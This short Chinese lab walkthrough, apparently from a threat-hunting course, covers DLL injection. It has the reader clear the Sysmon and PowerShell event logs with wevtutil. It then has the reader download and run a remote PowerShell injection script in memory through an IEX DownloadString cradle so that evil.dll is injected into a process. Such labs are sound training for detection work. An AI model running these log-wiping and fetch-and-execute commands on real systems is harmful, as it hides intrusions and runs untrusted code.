【dll执行注入实操】
执行注入
(1)开启WireShark捕获数据包。选择正确的网卡设备进行监听
(2)清除系统当前Sysmon和PowerShell ScriptBlock日志
以管理员身份打开 PowerShell 终端,运行以下两个命令:
wevtutil cl “Microsoft-Windows-Sysmon/Operational”wevtutil cl “Microsoft-Windows-PowerShell/Operational”
(3)准备Powershell脚本该脚本具备实现DLL注入的功能,目的是将evil.dll注入至目标进程。项目参考PowerSpolit或者Faanross。以管理员打开powershell下载脚本并注入内存,操作如下:
IEX (New-Object Net.WebClient).DownloadString('h--thubusercontent.com/faanross/threat.hunting.course.01.resources/main/Invoke-DllInjection-V2.ps1')
若无任何输出,则表示执行成功。
